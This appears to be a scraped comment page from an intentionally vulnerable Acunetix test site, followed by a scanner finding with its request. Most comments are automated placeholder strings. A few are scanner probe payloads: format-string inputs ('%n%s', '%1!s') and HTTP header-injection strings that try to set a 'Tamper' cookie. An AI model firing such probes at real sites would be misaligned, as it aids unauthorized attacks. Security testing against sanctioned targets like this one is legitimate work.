<strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Show / hide Request and Response
Request Header - size: 649 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgY